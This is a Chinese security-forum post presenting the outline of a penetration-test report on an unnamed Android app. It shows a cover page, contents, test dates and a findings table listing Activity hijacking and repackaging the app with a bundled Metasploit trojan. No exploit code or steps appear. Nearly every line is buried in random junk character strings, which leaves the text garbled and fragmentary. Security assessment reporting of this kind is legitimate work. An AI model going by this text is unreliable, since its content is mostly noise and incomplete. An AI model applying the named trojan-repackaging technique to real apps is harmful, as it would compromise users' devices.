找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4151|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
: H% W6 l0 a" S9 o& {2 p+ { 0 e: ?2 }3 O! L! A5 X, `* E n

: ^2 e6 v8 y: p, P $ _9 G. F6 v" @; U6 p$ S% M: x
) S& O: U/ R, F0 B Z# ]8 S) _) K# ?4 Z, U

9 k5 ^( u/ B- T: C& i+ }) t% d / {1 @; `, _% { K9 C; S$ T( q
- V- ^% l+ x" B% c 7 V6 A: }4 M' ^" ~& J. j- J, y

: i# b( ~: W; W4 l3 n5 m 7 |" a1 G* O) A- L' X6 V/ z; } 文档编号:                ' Z, H1 u% i% s9 e, X7 ?3 [1 C& A2 o% w( g: O+ I2 v9 D( K

6 P% t9 g5 o' |2 q6 p, m / ^7 z) M5 w6 n- Z" p

# M* W1 B2 e% \5 R, F / Q5 u. m1 |0 h1 G   ! ]/ w7 U2 `# t# p2 N7 C/ V 2 t. i5 y8 ]: R1 Y5 o' ~

5 R, h1 m0 _ k: ^( G1 I$ p' {7 O5 W 3 F o. S v0 f4 a. x* M

0 y; W1 n1 @& |1 z r) [ 5 J5 b) ~; t* t$ q Y) e   * J0 z, w8 q/ U7 e+ k * q) E' S8 ?+ K6 `

o' u- E4 C3 M! Q E2 x8 l7 }- B u% I

, } u" Y% C" u! @. V, u( q 2 G i, k& W2 f   + Y! U" A4 Z; J) P4 K& C( R / ?4 H S6 C g. t0 c0 G

% L. k5 l, {) w+ |: J" t, E4 Z4 |% r4 b

: T5 b/ u. ~- N6 i+ k: j) ^( o) m E) N   . T; h3 ~7 _( k: r" w% P8 ]! R 4 i- O9 p U7 p! r' s1 O

, K1 P" ~5 a w) u6 A & F0 u' N6 w* q9 u$ u# C

4 ?$ y9 S/ l/ I f* A3 a7 d8 y4 \2 T& S" }# \   3 k' m6 d4 ]8 Z# m0 K7 u. r 1 C# L& Y' q) o; Z' M" T

5 }7 N9 r8 F0 e/ R9 s# _0 p # `# `' N9 L$ Y! J7 r

1 E! I D9 @' N ) B# K2 Q1 n& X: w- k/ w 某某某APP渗透测试 7 w' ?$ G C% f# A: t ( K& K2 o T" [. T# h

( J5 t1 j2 ^' R, T b" i* ?; W 2 e) g& ~! k# V& M" X4 S

# f$ w; [/ f# |6 u) K0 }+ d& C4 @ 7 M' I o% L! H( `; b   / ^ n# ?4 V' u. `& i4 [2 m 4 Q E4 p0 V4 E& n# a6 R0 _$ w

$ h; j6 p) j% r1 x2 N- q9 q: i : z3 b1 H; e5 O' C

9 c4 w& m. |. S# |( N( r- z1 J 1 T. M1 [' d- m3 t6 Z   / g0 C8 D- p4 L2 E6 b& i- W( K : @8 E! n3 a ^) B# ~4 g

2 x8 \' A+ {' {6 ~2 U% B3 g' |, F/ V) n5 y

4 F7 K: _. X7 n* Y/ ^! h # k; M0 w: [+ w3 K9 w! G+ Q' i   / q n5 c# ^9 v8 A2 }( }' {2 P% ?7 E& g3 r& V! l' s. j

/ E u0 Y3 }. `( P& s9 V2 C+ | - W/ q; D0 H) j# n; m

- L+ Z& o- T5 F" Q1 _; U5 F( L0 V 4 A2 e- |. a* \* o$ ?, S4 Z   . @0 G. N7 `" s) H0 {/ z2 S * F. T3 x# [ U! d' ^5 q% `

' b& s) W' [) ]4 k# z; G, K) s 9 D7 V) Q0 `1 r2 D

* r! f9 W B1 _3 {9 x) n/ M- ?6 D% }; N0 C0 K. X4 ? 技 术 报 告 6 e Y$ ~. z; B: |7 ~1 _4 d 8 C6 v+ G% @1 }. j

( c7 h2 F) Y/ @) K D. v ' _" I! C) P) H

1 _4 Z+ L, H0 ^8 b( V . t) V- f' @* Y# E* N9 A, ~+ y   5 L1 N) \: J* {& Q* l1 V ; L5 n" F* R5 D' f

0 Q9 i) K$ h$ }" O) K1 T) Z; ~8 e: b& F

- U* n. L9 J# R9 [) F/ E+ O4 O- t) z) }* A+ \   ; e- b0 K' P' A8 y: S( x/ a5 ~ % l9 `8 c5 R& @. r+ X, y

1 M& p2 _7 {) s$ m $ x) @& [8 m9 h( H9 K

% d7 J/ U }! |6 b1 Q# \ - l" x6 V! @* f) M4 e( L. v: g   ! u3 @1 ~, b+ q% o2 K, N, m! N* d ( S7 p0 V# G7 v7 ~

. c1 `+ G- n# i, d8 k0 d9 V V4 G$ X1 ?9 d# s4 q9 N* v

! f) n/ ^* f7 C }+ [: w$ Y; H/ ~ 1 x: M9 z/ f9 Q5 c4 ]4 o3 v   % l& L$ a+ q, ^ F; w& `6 C $ p5 _9 U4 f8 i8 }8 C- R

& i' B# p! R! f3 V9 h) H$ K1 Y: y$ k 8 U4 M$ j G5 M; k6 m) X4 _

7 ]) n: _9 z3 p8 f! X ( ~/ o4 s6 M+ `# N* U+ ^; D$ H   4 _: d$ s+ T' e2 r, s) O# L# y! ^ 2 e* G5 f3 f4 A' l0 C, D

$ J, h. N1 R. h; G: f9 a 6 d+ r# I" m3 Z Y6 e2 }

1 X9 r/ a- v. l' q/ ` 8 z) _ H* n2 E* ]% v" S- m   " E: K0 F- \% f0 V5 R1 F4 w# W' z 3 b* W/ H2 N7 a4 ~7 ?0 E

; p4 ~( G! I8 }% d* r1 L1 J3 n1 p- g; }! J1 F. B! w' f

" D# W( v9 M: d2 v , }/ }/ N& ^! o+ u1 s2 V8 ?   ; P( J8 a2 ?2 F, B" s6 K, ` 0 p) o6 e# d9 K1 h S9 W

" _- U3 S/ F3 v/ a' R& q # ^5 J+ C! c" m6 {$ G# s

8 R/ ?$ y0 C& r; T - x P7 f2 r, O   3 L; E4 j& k* Z$ G$ p9 F3 L \& N; g: H. X4 q0 V

) H9 v* f( \' I3 i9 G3 z6 M' g3 y9 O1 A3 Y

; @8 ~2 B+ c* p5 O- o. q- T* n, D1 q# j7 b4 t" M   7 U: |; g% o' o8 k& V4 E 7 ^! Q$ M. m. v

, f+ a+ h$ Y& _* k+ m) _+ d5 z . O% W( B: N, @7 _7 t. W* N0 d

1 d2 }$ `6 N5 R7 c! U0 L2 d' b v& H6 D C) r   0 q& i' R, _2 S( f U1 i4 b" [& C2 @1 K* Y0 O

: k/ p9 O4 z) k& @; h& W + `& z- b ~* U) ]# o# W3 g

1 M; K0 J0 E. L" s n 4 x. l" E' _9 v5 k3 _- T1 `   6 \3 U+ Z/ R1 \2 R% h / @& d1 s J# u- n" }9 N; p+ k5 x

+ v" |. S' g% } ) r3 j& R( W3 A# @

# X% t Z; Y' Y9 C1 x * m9 y4 `& D. c" u ~( z   0 ^, X" E' w8 d 0 n$ I* I; y0 q: A4 p

# ?8 @7 q% g8 x8 P# [ 8 O9 x }6 B+ ?* _& N

4 c3 I( v( U ?5 E6 R6 e' D' [: w - I7 E' H: D5 | b1 B   & F+ V/ r1 Y/ U, W! }) _6 `$ ? |+ U* P" `4 @7 X1 U

4 k5 r2 X" r; T1 o # ]# [5 L, l: j( D' |" V

5 @* G0 d5 _# ?8 U' B7 z$ `2 o 7 E+ |: b4 u! P8 C/ \% \   - E8 F7 |, G( t 7 V. Y/ j; Z V5 u+ ]2 t

) T; s9 v7 b" E, x5 y4 V 2 @' \2 H2 w t! A* G# r

/ o2 X+ g( `9 R2 Q$ H* k( r / _0 L, Z" Q4 P6 d* p   / K0 |# _1 W, z 7 G8 ^, m+ Y5 K) w

5 l- U# ~& i+ e: L ' ^1 c5 r# G8 n7 x$ X! Q7 `) v

`; F+ m- O2 Z. ~. H) }( h / f7 m9 y7 A, A6 ]8 m- q6 a) t   + e6 `! V5 b0 Y& C; W; L! b 2 Z+ T0 V2 q3 G$ ~. m- l

4 ]5 Q; }3 s/ |3 v- y8 X% T6 ], | ; Y6 ~; O, `. H& s

* P+ e& f J! f. l0 E( y 7 h/ t( j! O. g& n# R ~   + u* P8 }/ G& n& G# T! \. c & @4 E* b. W+ R+ {' }

& h4 F! N! f& Q8 A* Y; v / B( `8 ]8 P7 ^6 d6 P; z

5 u) p# M1 ^7 [/ M0 n) ?0 {# ~ % W" [2 c' n5 J) M# R   " j: o) a; G( _3 X) ?+ B/ _ {4 ?+ s ) j/ q( n7 D1 P% g4 }

: ? f* U. b5 Z- ?! p5 s, q- H! r: D* Q

, B6 r7 k6 V0 E: G/ b }; T% w; N8 ^0 T _ 二〇二〇年 " Z8 c4 r# L8 l/ A' L : Y- {# k1 c/ M$ j

6 t0 o2 c) f# A& C/ u # ]0 s3 ^% d$ X* J# B+ S
! e8 @3 B) u( b. w( h ! ^3 w3 ~! h( R; z
! }+ f+ b6 K" G! d 5 K: B- P! t* u, x7 E " R/ P' A& d1 _. V, G/ u; h3 @ * i. C3 Y" b3 A3 E9 T+ |- s N
7 U& Y o/ J$ v/ Q( Z9 L; F% V5 G0 c6 W! }5 i
( s# m9 U: y3 ^8 `0 S, L0 e( z5 H; c( g' r, B0 ?
% f; C! N' `' J9 f% _ N 9 P0 G- p: x) {2 p8 |+ @7 F 9 \, m4 @$ _2 C' r7 R7 x% ?+ E / I; |" R9 q, a% O( a; @
9 A0 T+ ]0 w5 P5 ^: @ e7 ~) b6 ^' X& n" V0 Q7 k. {9 o

8 L- s$ k6 ^5 y/ @ X3 |# N$ V9 z* _& h: h% g 目 录 & \2 p7 r7 k2 b5 L8 i8 ^ 1 u% K! J, f- b' [) ^2 n3 t- R

/ S" X2 q2 ^* h! q 2 x* t' {1 h# W+ r* w 9 j. N. k: X6 K. s3 `" i0 Y" X( E& ?1 V

8 z+ K1 j) w. P6 K. w! `- d3 C9 j+ g7 b, C: f   ; B, V( N7 E4 o2 T7 u C o4 \0 u4 i" p2 @

" W7 a5 T5 V# i+ T . z! B# \+ k5 A

8 k$ H% A) P& m; F( A 0 e7 ?0 R: ~/ ~ 1 概述... 3 % [2 ^# }4 w3 {+ k3 n3 W% d4 N G/ r1 R* i

6 r# I/ U# r( F# `0 k% ^3 p) J" r" y) ~, e% g4 q

/ E& {7 v% f! C0 t! p ! o3 m, U% [* `- | 1.2测试时间... 3 8 N; p/ ]# ^& r8 X5 S4 ^ / |$ p3 |5 p8 a! v$ Y

+ d: V0 k0 H8 n! `1 G/ |0 t4 `9 z3 j$ k6 Y6 _

, I7 [7 w4 A- y8 B. y( Z* h4 A" m6 f. v# _, ` F" e 1.3测试对象... 3 0 W: G0 Z0 }/ {- h" A% r $ i8 l! t' ]1 U. U3 h/ o% y% i- T2 H

/ Y; M3 X) f' S$ x+ _0 Q $ ]- w- ~) _9 f/ x3 u/ D0 t- M

# k/ l+ {) v1 d2 A7 Y& [* ^/ X# h! S1 ~5 O5 u: m% U( y 1.4测试结果... 3 7 i2 i$ H2 k2 o. }: |, Q; Q% Z+ S# b7 U

; C4 [. K& A; ^ }; B6 K- P8 r1 o) [; [: c5 j% D8 ~$ Z

% n* G1 f+ t8 X2 f" S5 b+ H+ j # ~) c1 g# D H, ^& }1 c 2 检测结果... 4 ' X' B7 }) O1 C2 t+ o* A : o7 T/ L" }( p' ^2 R5 V; N

+ G" S# N" f( _" K. B 9 A5 [' J0 z$ g+ T# K% J, F% K

G- l* ^- J. O/ d4 l K3 y5 n9 U- C I6 {; ] 2.1 某某某... 4 ) K6 a Q h# f7 O" f" A# q, O* i+ H% @, ?9 a+ w5 Q

# D0 L& H' f6 o0 N7 J ) j8 e2 H4 N. v+ a& ]# ~) }" B

6 p4 w2 y/ f! t1 t) O+ Q u 1 {. h. f4 e% g! f {: v) B% L1 g 2.1.1检测目标... 4 3 L5 Z1 @& e, V# i5 k4 e, @* T! N) L8 {

3 ?1 h0 M( r0 p9 N! | 4 O2 w; M/ g) Z2 h

4 ^; x- M( S. z; t( G0 ?5 U& R' @$ B( m. S3 { 2.1.2检测结果... 4 5 c' n+ ] M) B0 D0 u9 \' k' H# s) }' M D' u# _

# X/ _5 d' ]) N$ W0 T7 ?+ N/ T2 h! e {

7 s8 M# a' Y5 ~) ^! ~9 D/ {0 ?, }5 H& w1 A+ V9 Y 2.1.2.1. 4 $ |/ M, k# G' ^0 k- m7 C9 t4 a" V7 Z " B( B6 H) ^, m& q4 M

* f" A% h6 d( _5 h4 y/ p * N- n9 A, y8 {; k7 T# ^* p5 R

- U) E+ ]7 |/ z( U* A0 W( w3 B p/ j) G! X. f 2.1.2.2. 6 , m- w' m# E* s! z- U: ~: n- ]) r f9 \1 y& {$ e& e. T

6 Y% W, X8 b' p6 _: M & T+ k* m* \$ g. y: O

; D& x2 U6 A. }$ \; X# L& P6 V" y6 H & d' l# L6 {5 a * s& g& [$ e, z2 @) a

9 L2 q4 t0 L; a- p- r ]: c, f; K. s" B* N ! k& u: J- R% w F- v 4 E9 z- @ t8 Z5 `2 u
% P0 C. O' r5 a* Y% R" D % r. @) z& m2 t, m- {
( _( E7 ]; L& j8 o/ I ~, j 5 j2 o1 e- v! w % q% k" P/ r1 _ l# [0 W2 D. N0 H* i$ N5 Q, p$ h( f

. f( ~, i# }6 u( o7 V ( e5 ]8 ~" Z; r/ b+ @( x, L 1 概述 - D* u0 m7 e5 \' [. Q 3 S9 b' K" ^/ t

' v7 ?4 J9 N/ l1 O! s0 E5 N+ Y P: C7 s8 z! f0 l0 f9 B

& A0 a& O) U' e0 }, y0 k7 ?. j3 S7 g1 c3 k- l* V7 f 1.2测试时间 7 P# d. r5 r3 K5 @+ p 4 V6 A6 K; {3 i& y6 w

) [ T$ }4 r! u5 y. e. Z" x5 b% J1 e9 x 5 F: [' z, v1 H3 ^% d2 F6 H0 b( B7 W R; Y! R/ b0 ? p' G+ L& r1 ^0 s# Q+ o& c! m9 {6 e! @0 x5 D( a x; U' j4 x4 X0 k3 K& _2 G9 t. ]- `& }1 b. V2 m4 |' o2 U+ r( I& R. w2 U5 [& b9 E; t! n/ y* N0 ^! r& @+ N! l9 i' A5 V" p4 p5 s& V- f& j) T; X% Y- e- j4 e% M( c5 ~3 K- Z$ U- K2 i! s' D" K7 f* [% a+ i5 R1 r9 n* Y* K5 c3 ^: _ A" M6 M' i0 j- ~9 N0 }) ?2 l* ?7 ^/ ?+ _5 m+ g* V/ v M3 D8 j e- A- y7 F' b) m3 m! f0 a$ i& M' W4 W) q' O3 ^4 X& _6 G( e$ m( `# I- u# B1 H, O' M) e; Z6 e# `1 ~3 r% R. Y6 A# d! a1 L* y9 {+ a9 u& c; X6 R9 j- d5 U) b& D' W0 ]/ {! G" \1 }. A4 j5 C& T$ M0 _ {2 U3 r& x2 z: F% k; Z9 D' `, i# D0 E( L4 H o3 f, ]1 s& \) @* V$ |. X9 K, T0 j$ h
) L8 b* m1 L# o" H1 X6 p # q* V5 X4 y0 d4 V6 l

: S: p6 r6 |% B ; z+ a) `! ]$ ^0 T" v 渗透测试时间 P, s+ @/ N0 O 6 K5 n% Q5 v& u& g& _) u- W/ n

n+ l2 f, X! r$ `# h( _* H5 O . g9 S% h9 b8 V) C$ X6 Z4 q! ?
M( z6 D. C8 D" E ' l3 N `0 R* S4 c5 j- d! }

" d( n, e8 n7 U6 ~, T4 ^ & b8 r8 v" v2 q: o 起始时间 ! d1 G+ l) h6 b; d8 b! I. y0 u$ x* J8 P9 V

' [7 Q5 [% E' n4 i # U$ G: ?) J4 [* I" g3 R3 q 		3 U$ p5 \/ U% y4 P) {. A6 Y( A& ^1 b, ^* m* H( A4 k# N

. X4 n* U% }+ B" V% L5 @) u & b h. z' j+ t5 h6 u& x3 e 202046 9 Z' B U1 u9 B* O: O % p" D9 A+ p9 |( m8 G9 x, ^

9 \' m& ^6 n% E, i 1 j2 d4 ^' D7 W# Y7 v6 h9 C
% t( l; I0 c) W/ [) C ( G& u# v3 w8 ]2 Y1 @

8 H2 r# l2 `# Q! Y2 @# W 7 U2 A* F! _+ k4 p% s1 u 结束时间 2 o/ u4 I* @3 N 3 E% G$ x8 e. j

) ?6 w6 V$ l" o) D1 b3 K 5 ]: T1 L Q' X/ L; Q 		6 |" e' d4 }9 k, O8 `) q+ h7 m0 x$ p. e. a. Y' Z. [

6 w# Y" C5 ~7 C1 g. X, J' _# I 9 u, p- x9 v8 U& b: F4 R 202049 - K& U) ^) s8 ~% i , n+ L$ E% K5 W& Z

7 ]# b' P' \, L: Z9 B % o+ S5 S3 x, \% h9 L
& J+ M t3 _4 P) y, @ 1 @4 A; X) m4 Q' @6 p" x/ q6 L

& N' A" F: p" d& ?! v0 Y/ d $ x; N- m' F1 h' ?5 [ 1.3测试对象 ) b: o/ Y/ B0 l k x/ c; q; N , w1 o' D0 J% p0 [

+ m7 X8 m% f6 L % S/ h; `7 I' j) e+ g; l3 Q& @

4 Q( n, `" a0 ]9 v $ ^1 J4 W7 _8 Z 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / K# }5 e/ M- F# y& a& ?% c % k: `# b0 J$ Q' B4 _9 V. c! o

, V* G0 e! R0 a& Y" Z% ^& J3 Z5 I ) S7 J( D5 `, }; P3 ^' V

+ W" k0 @$ V7 F9 ~* | 2 ~& h+ \$ o' m2 _, K 1-1 检测对象 ( ]3 S3 S+ A$ x7 e) r" I c5 Z% H8 k

' A( \! w8 m6 U5 }+ \ ! \* |6 o$ n: `) x9 S ' O5 T8 J: T7 [6 b- h) d% w# }! l. g) J! O* C# i {3 z( y6 g6 `3 o1 E$ ]6 h0 d! ~ _ w: X- ~! b- i7 N3 X- ?. L' J8 b; ^+ V) y% H ?' n' {' ^# G* m9 G% F: _: c/ r) n" i, Y( D7 d" i: a$ i7 c4 k1 P" j2 i" Y, q* M$ T5 l, x8 U& _+ h+ Y$ g7 b9 I9 D6 Q* ~5 F# o8 M& s$ T, _7 t/ S9 w5 k$ X. d* U) x' C- y0 c* Y' |, \( F3 n7 N" r9 Z: F6 P! W* R3 v. J/ e/ V- q" _- g4 _: }, s* V `+ Y# K: Q+ g0 l1 G, h4 k+ Y3 i$ e# P# e' H N/ q8 H& s- J; I6 F/ I' u* S2 i5 L6 d9 ^' A, j4 o7 l0 L- p9 l1 B) w% Q5 T+ E5 v2 B' D4 f; |4 ~; z; G+ d7 ~4 H# M, ~, A' V9 `, }0 `: a% J! p3 }6 z7 j3 P6 O( Y# k4 C2 w2 j4 w* a1 \+ t! a1 c- H; u. N, a, {# T) P$ }7 T0 s- b( m0 E7 n& R8 B9 x$ K" _$ ~: d+ h. E$ l1 a) a/ J3 M2 D, Q
/ F$ s p1 l9 D& s + u. X" d: O% Y, @0 W" @" l0 V" v! l7 J

0 z" D9 ^2 p) m. q- j; T . n7 c5 o* q: y( Z 序号 4 m5 {/ \2 b2 y; |7 S% k6 ^9 k4 L " J& n+ V4 G0 N! D9 J

. W- h$ b: d j* V0 o! \+ a; K$ `% ~ Z4 t ' c7 U, ?$ U# V! H" s 		. P$ _+ ~/ Y5 q3 E3 n: h( ~& K. l" m2 U+ Z/ W2 n9 z, t3 Y8 s

+ |' E8 F7 k* d8 i! t# }, S2 {- \: B4 W. @( y" j+ b; r. M4 l 测试对象 U: u! q% z' n% d S: z( x) o: ~ " A/ y5 ~8 J3 }2 `1 h; t

' y5 _5 K' c1 k' q6 p4 q. U1 d # n' J$ ? e( g# V5 l# P/ L3 r 		. m" c6 w+ _3 t+ E& M! t% e. W: F" b1 k/ F! G: J

+ x/ ` W0 H; ? B ?9 r2 E3 \4 J* r b5 U 测试地址 - Z3 w4 y- [" G1 H + }2 E, h! F3 ^

! |5 \2 N( ~+ {- B. Z9 w+ H" Y; S " N& H9 C( Y! X1 b9 J8 w, \ 		. J( I4 L7 S2 z, u6 M$ r# f- P+ A2 v- i

" Z3 Q& C3 m' U N/ K" m8 q# {7 F; e 安全漏洞 2 Q& ~3 E3 f3 H: [/ i g a& K9 `+ s* z& i/ L

" N5 u( S/ ^0 L0 B/ F/ p6 z $ X; c0 j. `; w1 j4 J# O
% n4 H( }9 ~- Z; n% M* z$ f6 l. l8 T

& ^+ p3 E" p& o; s: ~' U2 I( Q6 o2 ]) A' r6 v: E% Y; n 1 : Y' f( T$ z1 O5 K 6 u3 v% P; R n- _

C c, H8 v& P9 [3 r9 R" {, F( Q- T* I 		/ r6 ^. a. m" Y( V) h7 @& ^# |% B1 J& l7 F8 | B

/ r$ R& I+ k- `. J& h, e4 b$ N3 R i$ @6 N 某某某安卓APP & F* b' d) F) I3 Z4 e : h5 [9 s0 N4 j! @& C' i

7 ]. c. W: K+ _' j. m: t9 L & o+ O* K* \& l1 |# A E; z 		; Q- o+ @: {" y2 n: o : H* L+ K* [+ ]1 |

' S; {* i, f7 e ! L k8 Y, U# G' P4 ?   ( L# F: \4 Z9 w3 k* S , U! L5 I0 Z) T/ e. h

% h. \; K( {) B) b- `8 p \$ d7 }* E1 b% j7 _4 j2 W 		4 E E& l% A. Y- z1 P$ X 8 T+ h# ~% v, p( @; S

8 W# `+ V5 F. M& @2 f: s6 n4 [2 ~3 F; j& c 2 8 e7 S% Q, j. Q2 t ; ^4 ^8 F, {" L/ O# o' n- l

% e* x/ l, _ S, o4 q! Q* N' H* D* } B7 h. _" d8 Y
- b1 h: K1 D4 R" R" y / a, z. W8 Z% z+ @' h; S

6 y- f- S ?4 h. X0 a2 L3 K 3 ~- `. C1 M6 k 1.4测试结果 ' y& G1 ^+ }. T8 S / Z) u. D1 o+ N, u4 W

6 T; r# c/ Z3 e) v0 S( O' y ) K+ Z# J/ x3 l1 V( U3 W- J* [8 W

) v& H% L: V' f2 d; H) D4 \9 R' J/ a# H r$ Q! g$ ] 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 \5 g' j Z0 ?2 i2 Q+ M; @ + _' M+ W0 w! u+ b/ r. C+ r

7 w: {2 h9 P3 \( S1 D. c* o: i& N. } * _* o# |& X, G6 s% Q+ n! w- l/ k

" c1 _& A5 r% \ 9 |+ X: R. t/ s" }   * f+ S# L* \2 `' S6 E6 s' D& ?+ I1 o0 A6 ~4 s

) [( \7 O9 P4 D4 h 5 |8 Q$ |, M2 b0 k/ w8 P& A' m
2 B3 z! u9 ?9 z. W ( u; y& u9 X2 N, N/ Y 9 q7 \- e' [& {* E& I; P( x$ F4 [7 ?: W6 M1 v4 T# d9 B- H4 v' a& g- k X4 R j6 d9 M, q% n! ~" Z1 h/ D# U- s% L/ N1 @% x2 _3 Q" k9 O) u) A) D$ j1 c4 l3 a" d9 A8 j7 Z M. e/ j( s' L* {" I+ h( L1 N( [, n3 N8 `# }; s7 h) M R* W: l5 `" @/ [! i8 j. K+ V8 g$ e/ n8 D/ V9 d% s, ], [& p" R- |: W& s, L- _- t3 x! B6 h" w7 y7 N ~% y2 A% c6 Q$ M, t, a5 k0 d6 X m/ n& x6 E8 e8 l( w* Z( E4 d9 ?# Y, o6 O7 `# \& |, T' n* n. n* t3 U) s6 C; j, S. `6 K$ J& l' E' ^2 n U- _$ a/ p: u2 }. g q0 p0 O$ |. _0 Y+ W1 m5 f6 y$ j" b+ K' }: ?, _, Q% ?) c1 @0 U6 x8 B* B* x3 p) \0 L: o. W0 ^2 A6 r% |, u1 T* j) m% M8 Q" \3 v) z! o; t3 J( _3 }- _( e9 b, Y! h6 W& {$ O# D# S) X# a5 M C- [- \( p9 R9 H( m7 A. h, b a" ? _% Y/ J9 M' R) d2 j) l, ~# W" \: I- e+ x. T5 R1 i$ |6 I J( {6 d% w/ T2 w: E; Z1 T" D, ~; O7 ]0 a- H' d, b, ?1 \7 _8 t" A! [7 p# ~& L5 \5 X. V, j3 _; B% x* @+ ?5 s6 E% n0 j6 d" x# Q$ o2 z( x0 l2 |7 C R% o6 \' M. V6 I7 f5 S* o2 z6 U0 ~+ M3 D* N1 t1 k: T% K3 l6 p/ j( C8 q' e* e' p# _1 `* E9 M( J9 Q0 r9 i4 U/ N% W* ^1 @) B5 O) X! ^) y' U7 e$ G* Y5 l+ v% N/ F( _3 e0 s( ]- o; \% D: m3 e
' K% A% x6 X$ h * o: `% w# N2 H5 D( l1 A

2 S! ?8 }8 {' u 1 t1 h S& g4 a9 C }, c4 H 序号 . ^% x9 |$ }; Z/ a1 l" e ) Q& k$ O4 W r5 e5 q

9 }2 i/ A8 |3 X/ z; T+ ^ Q9 y2 h7 U0 f1 G# V$ w; A- M5 `- B 		* Q. G( Y. x4 a f" d0 ~; k0 R5 Z! w, D: O2 _- }# ?4 X3 H5 w

: t- \9 \8 N0 O9 i4 u3 R* m 4 g) H- \1 L7 a6 _ 系统名称 ' n5 p1 _- g. \. s 1 j# `2 O u# M) Z: {( ?

9 t6 L: a' h' [3 U" t 6 q6 d$ v I- }% s8 q 		# L4 i( R+ i9 i" B 6 g/ s9 z& h: i$ y; w. I

7 {3 z2 d+ h% i: N6 E& F5 V . W( N7 _( z2 p2 ^; Y' P" U5 j 漏洞名称 * ^% l0 W& s+ X9 Z+ R3 u3 O; Z . Z: v7 V9 v$ ~; i! b

9 d# s( J) I- l0 X: T ' j3 [0 y, h1 t: _ 		1 x: _6 @: a. ?) t5 R( h! |( q+ r $ D! f, U8 a. D1 q$ L/ N

: i$ D$ v" h$ a# E4 G y3 ^7 \. ^! H& z+ B2 K" W 漏洞危害 . }" ?: M) ]" R# g ' a; r$ o5 g' ?9 a, M5 P$ ]

+ K( T) g Z, j- Z3 |9 Q N! E+ a' V 		5 ]1 q, s! j- ?' q1 c j& U5 s7 ?4 b: Z8 m

& Y4 c T" a4 h: ~( O2 w5 A$ P$ D0 X 修复结果 + w! ?0 r; y: G( }. A 3 b) n% n9 P F& I$ G& L

, j# \7 ~. @0 ^) d: _ 8 C* U9 M6 Y6 ?! O2 ?
- N, ^5 @0 _6 ]1 f$ k9 q & W) {- _7 T) X! Y& U3 U

) p: M- S1 D# d, m/ L 2 s% N" _4 n4 E 1 7 M$ A! a' V6 {+ {# B5 K) u2 Q; W$ u. h( T6 ~

/ j) T( R9 m" J; s: Y2 @ 6 c$ M" ]# F( D/ L- } 		8 Q2 \1 ~: x6 i+ j9 G. w + s q P1 V' d+ E3 B" A

3 D1 C/ O7 D3 g4 I% {, ] A( ^$ t 某某某某某某APP 3 s$ G2 ]4 u0 d. J 8 v( Z* s) l8 B0 k' d1 X( U5 w

* l5 [( U4 p: p& W; F * L/ i1 ^! C2 E, W 		2 `. ^5 n' e& n5 [0 \7 z& D* V7 n9 w: A

9 k' r9 Q1 F$ I3 E( G/ |& n* ~+ t- ^# a& w Activity 劫持 / ~1 |0 d) [$ b6 B% H( ?1 H4 O* s . |2 s0 k8 D, [( L$ B. {. |

5 d. H* f* `. A9 U% v - y! z4 o& ^) b, R

. l+ n$ Q. }( s2 A n! B) a% g- N9 i   9 R% T* ~ ?* A! z5 B9 ~$ ~+ \ ' ]' P# ~, k: Z6 q& @

5 | _( V" L4 q I/ \5 E2 D 8 e+ R! R5 Y5 H y, o/ G# ?9 Y 		1 d, S J$ |& z3 x+ R; c. M 0 X; c* i5 K: h) K( W

' }! O4 t" |* @% b S8 i3 W s0 \& {' `, g) Q* g . N: {; k; a' |: r$ y 0 Y" h9 }& s2 s: ~2 _

) j4 r5 r' Y! F7 f1 E. p4 o' W: r- ~ $ R2 v! F" q. N! p, ~+ |( j2 ~ 		8 D; G1 `8 f' m$ ? $ M% R/ f5 O/ v6 ]- x! x0 k3 l

8 \6 j+ E% D" d# h; E 6 o" l3 v- j6 o" b0 S+ l& w   $ u" [' ~; q1 G. ]# b$ ~( v 5 u# L: C2 c) F+ j

) |8 K$ o5 A ~9 l: H7 j% C $ `& V9 x6 d) p$ L ]3 a- P
4 X, Y% ~: j" s9 x# O, f4 n' x u; O0 ~- J$ L2 x- p

0 s9 s) s6 n; l6 y. v9 X! o. r # _4 f( u. s, q; b3 }- O- c 2 Z* U* f" s# a% h2 X1 o9 n& ^ , p) |& T0 M1 c x

# k* |7 P- H. Q1 L% H' q , p5 q, m/ T1 E( ^3 z. v 		) U5 W" @1 N! X/ X {$ w) r! h, p' d

9 e1 o7 u; e- v6 ^8 x$ R5 Z 5 r- t% t) B6 M' W/ {0 F 某某某某某某APP - r w" b$ D) ]" y6 i. O# H+ X' q & b6 h% }1 t( z4 [+ m

* v- }7 Z% b# x2 Z- X3 V 3 m2 E2 [. e" T. b4 a1 L, N4 e) H* D 		! l% u' u5 w; K+ U& l) m% A, U0 m9 d& Z; X

, ?: W; O& p. q: l4 y v " _8 B8 d& G. d6 l3 _ 反编译二次打包捆绑木马、篡改APP代码 * W @# w( h3 g( Y2 \9 f) q- p 7 p D! }: L! w

3 Q5 Z# }" ~: k# N5 a# | , [) W1 U2 u; D+ f 		& i' R( Z {1 y/ p( D; F) ~1 r" N 1 Y- _7 P0 n5 @- v

+ L* s$ I: P8 r% ?0 X . Q# ^$ a! p4 V: H7 z8 e , K* b- k. G" | 4 M- |) v# Z1 `8 K' E! I" @

( c4 m9 O, C, g$ c5 W 9 q0 P3 m) C4 a 		) N4 e$ M2 V: s; G: W! s/ I 5 G6 ~9 S$ Q/ S+ B

4 @1 {; \2 N [0 v3 b; r5 t; u. G o6 ~$ R; w   " S5 x1 h" d- @8 R& K2 F / n/ l5 ]. L7 \, L3 D

% i4 [7 A0 ?( c: u# ?2 E" I5 n5 K 5 m9 T: D4 c8 J: e9 H
! l7 w- p, W+ ~: H$ X* V7 a. t" s* M8 B+ v$ X' j7 A2 a
. q, T9 C6 g$ Q; j) ]- f 8 \, k; A* D& _/ Q# |# a. |% {

